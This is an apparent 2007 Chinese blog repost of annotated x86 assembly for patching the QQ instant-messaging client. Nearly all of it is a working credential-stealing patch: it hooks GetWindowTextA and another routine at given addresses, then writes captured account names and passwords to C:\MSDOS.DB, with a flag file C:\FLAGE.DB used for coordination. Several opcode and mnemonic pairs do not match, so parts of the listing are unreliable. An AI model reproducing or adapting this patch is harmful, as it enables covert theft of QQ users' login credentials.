信息來源:黑客X檔案
在4002D0處寫入字符串:C:\MSDOS.DB
在4002E0處寫入0DH,0AH
在4002F0處寫入字符串:C:\FLAGE.DB
在400300處寫入代碼:
400300:50????????????????? PUSH????? EAX;保存EAX的值到堆棧中
400301:58????????????????? POP????? EAX;退棧,但堆棧中已經保存了EAX的值
400302:83C408??????????? ADD????? ESP,8;退棧(2個雙字),原堆棧的值暫時不會被改寫
400305:A1FCF7A100????? MOV????? EAX,[A1F7FC];將A1F7FC單元保存的數值存放到EAX寄存器中
40030A:36870424??????????? XCHG????? EAX,SS:[ESP];交換堆棧頂與EAX的值
40030E:36874424FC????? XCHG????? EAX,SS:[ESP-4];交換堆棧頂與堆棧頂-4處的值
400313:36874424F8????? XCHG????? EAX,SS:[ESP-8];交換堆棧頂-4與堆棧頂-8處的值
400318:83EC0C??????????? SUB????? ESP,C;堆棧頂向下移動3個雙字
40031B:36870424??????????? XCHG????? EAX,SS:[ESP];交換堆棧頂-8與現在堆棧頂即原堆棧底-C的值,這樣做的好處是將[A1F7FC]的值存放到原堆棧頂+8處,同時,原堆棧頂+8處的值后移一個雙字,在將堆棧頂-4,即進棧一個雙字
40031F:FF1528D66100????? CALL????? GETWINDOWTEXTA;獲得窗口的標題文字
400325:36870424??????????? XCHG????? EAX,SS:[ESP];保存EAX即函數返回值到堆棧頂,同時得到DS:[A1F7FC]處的值
400329:9C????????????????? PUSHFD;保存標志寄存器的值
40032A:3D00D98E01????? CMP????? EAX,18ED900;比較EAX的值是否大于18ED900大于表示將在讀密碼或賬號需要記錄,小于表示沒有讀取密碼或賬號無需記錄
40032F:0F8652000000????? JNA????? 400387;無需記錄則跳轉
400335:60????????????????? PUSHAD;保存16個通用寄存器的值
400336:6800000000????? PUSH????? 0
40033B:6802000000????? PUSH????? 2
400340:6801000000????? PUSH????? 1
400345:6800000000????? PUSH????? 0
40034A:6800000000????? PUSH????? 0
40034F:68000000C0????? PUSH????? C0000000
400354:68F0024000????? PUSH????? 4002F0
400359:FF15D0D26100????? CALL????? CREATEFILEA;調用創建文件函數,如文件存在則失敗
40035F:83F8FF??????????? CMP????? EAX,-1;EAX保存有函數返回值,為-1表示不成功,其他表示成功(返回值為文件句柄)
400362:0F841E000000????? JZ????? 400386;不成功則跳轉
400368:50????????????????? PUSH????? EAX;保存文件句柄到堆棧
400369:FF1538D36100????? CALL????? CLOSEHANDLE;調用關閉文件函數
40036F:6884034000????? PUSH????? 400384;保存程序返回地址
400374:FF35FCF7A100????? PUSH????? [A1F7FC];保存密碼存放地址
40037A:FF3500F8A100????? PUSH????? [A1F800];保存賬號存放地址
400380:6800044000????? PUSH????? 400400;保存程序跳轉地址(即調用保存用戶名及密碼函數)
400385:C3????????????????? RET;程序轉向
400386:61????????????????? POPAD;還原16個通用寄存器
400387:9D????????????????? POPFD;還原標志寄存器
400388:58????????????????? POP????? EAX;還原EAX的值
400389:6800064000????? PUSH????? 400600;保存程序跳轉地址
40038E:C3????????????????? RET;程序轉向
在400400處寫入子功能代碼(此功能代碼的作用是將用戶名及密碼寫入C:\MSDOS.DB文件末尾,要求參數為密碼、用戶名存放地址,同時要求必須先將密碼壓入堆棧)
400400:6800000000????? PUSH????? 0
400405:6802000000????? PUSH????? 2
40040A:6804000000????? PUSH????? 4
40040F:6800000000????? PUSH????? 0
400414:6800000000????? PUSH????? 0
400419:68000000C0????? PUSH????? C0000000
40041E:68D0024000????? PUSH????? 4002D0
400423:FF15D0D26100????? CALL????? CREATEFILEA;創建文件,如文件存在則打開文件,EAX返回文件句柄,如為-1則失敗
400429:83F8FF??????????? CMP????? EAX,-1
40042C:0F8477000000????? JZ????? 4004A9;失敗則跳轉
400432:50????????????????? PUSH????? EAX;保存文件句柄
400433:6802000000????? PUSH????? 2
400438:6800000000????? PUSH????? 0
40043D:6800000000????? PUSH????? 0
400442:50????????????????? PUSH????? EAX
400443:FF1584D36100????? CALL????? SETFILEPOINTER;設置文件指針到文件末尾
400449:58????????????????? POP????? EAX;還原文件句柄
40044A:59????????????????? POP????? ECX;得到用戶名存放地址
40044B:51????????????????? PUSH????? ECX;保存用戶名存放地址
40044C:8BD8??????????? MOV????? EBX,EAX;保存句柄到EBX寄存器
40044E:51????????????????? PUSH????? ECX;保存用戶名存放地址
40044F:FF151CD36100????? CALL????? LSTRLENA;調用得到字符串長度函數,由EAX返回字符串長度
400455:40????????????????? INC????? EAX;字符串長度加1,使程序多填入一個16進制的0(相當于空格字符),方便將用戶名與密碼分開
400456:59????????????????? POP????? ECX;得到用戶名存放地址
400457:6800000000????? PUSH????? 0
40045C:681CF8A100????? PUSH????? A1F81C
400461:50????????????????? PUSH????? EAX
400462:51????????????????? PUSH????? ECX;保存用戶名存放地址
400463:53????????????????? PUSH????? EBX
400464:FF157CD36100????? CALL????? WRITEFILE;將用戶名寫入創建的文件
40046A:59????????????????? POP????? ECX;得到密碼存放地址
40046B:51????????????????? PUSH????? ECX;保存密碼存放地址
40046C:51????????????????? PUSH????? ECX
40046D:FF151CD36100????? CALL????? LSTRLENA;得到密碼的長度
400473:59????????????????? POP????? ECX;得到密碼存放地址
400474:6800000000????? PUSH????? 0
400479:681CF8A100????? PUSH????? A1F81C
40047E:50????????????????? PUSH????? EAX
40047F:51????????????????? PUSH????? ECX
400480 :53????????????????? PUSH????? EBX
400481:FF157CD36100????? CALL????? WRITEFILE;將密碼寫入文件
400487:6800000000????? PUSH????? 0
40048C:681CF8A100????? PUSH????? A1F81C
400491:6802000000????? PUSH????? 2
400496:68E0024000????? PUSH????? 4002E0
40049B:53????????????????? PUSH????? EBX
4004AC:FF1538D36100????? CALL????? WRITEFILE;將回車、換行符寫入文件
4004A2:53????????????????? PUSH????? EBX;保存文件句柄
4004A3:FF1538D36100????? CALL????? CLOSEHANDLE;關閉文件
4004A9:C3????????????????? RET;返回調用程序
在400500處寫入代碼:
400500:60????????????????? PUSHAD
400501:68F0024000????? PUSH????? 4002F0
400506:FF1520D36100????? CALL????? DELETEFILEA;刪除標志文件
40050C:61????????????????? POPAD
40050D:68538F5800????? PUSH????? 588F53;保存原QQ程序被中斷點地址
400512:64A100000000????? MOV????? EAX,FS:[0];原QQ程序中被替換的代碼,依據環境工程學的觀點應該保持程序運行環境不變,因此必須還原其寄存器、堆棧、指令,此處就是還原其被替換的指令
400518:C3????????????????? RET;返回原QQ程序被中斷點
在400600處寫入代碼:
400600:60????????????????? PUSHAD
400601:6800000000????? PUSH????? 0
400606:6802000000????? PUSH????? 2
40060B:6801000000????? PUSH????? 1
400610:6800000000????? PUSH????? 0
400615:6800000000????? PUSH????? 0
40061A:68000000C0????? PUSH????? C0000000
40061F:68F024000??????????? PUSH????? 4002F0
400624:FF15D0D26100????? CALL????? CREATEFILEA;創建文件,當文件存在時則打開文件
40062A:83F8FF??????????? CMP????? EAX,-1
40062D:0F84FB000000????? JZ????? 40072E;出錯則跳轉
400633:50????????????????? PUSH????? EAX;保存文件句柄
400634:8BD8??????????? MOV????? EBX,EAX;保存文件句柄到EBX寄存器
400636:6800000000????? PUSH????? 0
40063B:681CF8A100????? PUSH????? A1F81C
400640:6808000000????? PUSH????? 8
400645:FF7510??????????? PUSH????? [ESP+10]
400648:58????????????????? POP????? EAX
400649:83E804??????????? SUB????? EAX,4;得到要寫入數據的地址
40064C:59????????????????? PUSH????? EAX;將其壓入堆棧
40064D:90????????????????? NOP
40064E:90????????????????? NOP
40064F:90????????????????? NOP
400650:53????????????????? PUSH????? EBX
400651:FF157CD36100????? CALL????? WRITEFILE;將數據寫入文件,此處只能使用WINDOWS系統調用,WINDOWS系統調用將運行于特權級,只有它才能訪問任何內存(包括讀、寫、執行)而不引發非法操作,否則會引發內存越權訪問錯誤,從而引發非法操作
400657:6800000000????? PUSH????? 0
40065C:6800000000????? PUSH????? 0
400661:6800000000????? PUSH????? 0
400666:53????????????????? PUSH????? EBX
400667:FF1584D36100????? CALL????? SETFILEPOINTER;設置文件指針到文件的開始處
40066D:58????????????????? POP????? EAX;得到文件句柄
40066E:50????????????????? PUSH????? EAX;保存文件句柄
40066F:50????????????????? PUSH????? EAX
400670:50????????????????? PUSH????? EAX;這兩個EAX的存儲位置實際被用于存儲從文件中讀取的數據,因此不用EAX寄存器用別的寄存器也行,因為我們沒有寫別的內存的權力,因此只有利用堆棧,任何應用程序都有修改堆棧的權利,因此,只有堆棧才能被用于暫時存放數據,而不會引發由于越權訪問引發的非法操作
400671:6800000000????? PUSH????? 0
400676:681CF8A100????? PUSH????? A1F81C
40067B:6808000000????? PUSH????? 8
400680:54????????????????? PUSH????? ESP
400681:368B0424??????????? MOV????? EAX,[SS:ESP]
400685:38C010??????????? ADD????? EAX,10;修改數據寫入地址
400688:36890424??????????? MOV????? [SS:ESP] ,EAX
40068C:53????????????????? PUSH????? EBX
40068D:FF15D8D26100????? CALL????? READFILE;將數據讀取到堆棧中
400693:90????????????????? NOP;空操作,此處是由于我修改代碼造成代碼不連續,從而填充空操作,是代碼連續
400694:90????????????????? NOP
400695:90????????????????? NOP
400696:90????????????????? NOP
……????? ……????????????????? ……
4006B5:90????????????????? NOP
4006B6:FF1538D36100????? CALL????? CLOSEHANDLE;關閉標志文件
4006BC:68F0024000????? PUSH????? 4002F0
4006C1:FF1520D36100????? CALL????? DELETEFILEA;刪除標志文件
4006C7:58????????????????? POP????? EAX;得到密碼存放地址
4006C8:5B????????????????? POP????? EBX;得到用戶名存放地址
4006C9:50????????????????? PUSH????? EAX;保存密碼存放地址
4006CA:53????????????????? PUSH????? EBX;保存用戶名存放地址
4006CB:53????????????????? PUSH????? EBX;保存用戶名存放地址
4006CC:50????????????????? PUSH????? EAX;保存密碼存放地址
4006CD:FF151CD36100????? CALL????? LSTRLENA;得到密碼的長度
4006D3:83F800??????????? CMP????? EAX,0;比較密碼的長度是否為0
4006D6:740D??????????? JZ????? 4006E5是則跳轉
4006D8:FF151CD36100????? CALL????? LSTRLENA;得到用戶名長度
4006DE:83F800??????????? CMP????? EAX,0;比較用戶名長度是否為0
4006E1:7507??????????? JNZ????? 4006EA;不為0則,跳轉到保存用戶名及密碼的代碼段
4006E3:7401??????????? JZ????? 4006E6;為0則,跳轉到程序結束
4006E5:5B????????????????? POP????? EBX;因堆棧被占用3個雙字,因此需要3次退棧操作
4006E6:58????????????????? POP????? EAX
4006E7:58????????????????? POP????? EAX
4006E8:EB44??????????? JMP????? 40072E;跳轉到程序結束
4006EA:58????????????????? POP????? EAX;得到用戶名存放地址
4006EB:5B????????????????? POP????? EBX;得到密碼存放地址
4006EC:68F9064000????? PUSH????? 4006F9;保存程序返回地址
4006F1:53????????????????? PUSH????? EBX;保存密碼存放地址
4006F2:50????????????????? PUSH????? EAX;保存用戶名存放地址
4006F3:6800044000????? PUSH????? 400400;保存程序轉移地址(即調用保存用戶名及密碼函數)
4006F8:C3????????????????? RET;程序轉向
4006F9:6800000000????? PUSH????? 0
4006FE:6802000000????? PUSH????? 2
400703:6801000000????? PUSH????? 1
400708:6800000000????? PUSH????? 0
40070D:6800000000????? PUSH????? 0
400712:68000000C0????? PUSH????? C0000000
400717:68F0024000????? PUSH????? 4002F0
40071C:FF15D0D26100????? CALL????? CREATEFILEA;創建標志文件
400722:83F8FF??????????? CMP????? EAX,-1
400725:7407??????????? JZ????? 40072E
400727:50????????????????? PUSH????? EAX
400728:FF1538D36100????? CALL????? CLOSEHANDLE;關閉標志文件
40072E:61????????????????? POPAD;還原16個通用寄存器的值
40072F:68E2B15C00????? PUSH????? 5CB1E2;保存原QQ程序被中斷點地址
400734:C3????????????????? RET;返回原QQ程序被中斷點地址
在5CB1DC處寫入代碼:
5CB1DC:6800034000????? PUSH????? 400300
5CB1E1:C3????????????????? RET
其原代碼為FF1528D66100即CALL????? GETWINDOWTEXTA
在588F4D處寫入代碼:
588F4D:6800054000????? PUSH????? 400500
588F52:C3????????????????? RET
其原代碼為64A100000000即MOV????? EAX,FS:[0]
地震讓大伙知道:居安思危,才是生存之道。
posted on 2007-02-21 12:35
小尋 閱讀(1030)
評論(0) 編輯 收藏 所屬分類:
嵌入式開發 、
計算機病毒反病毒學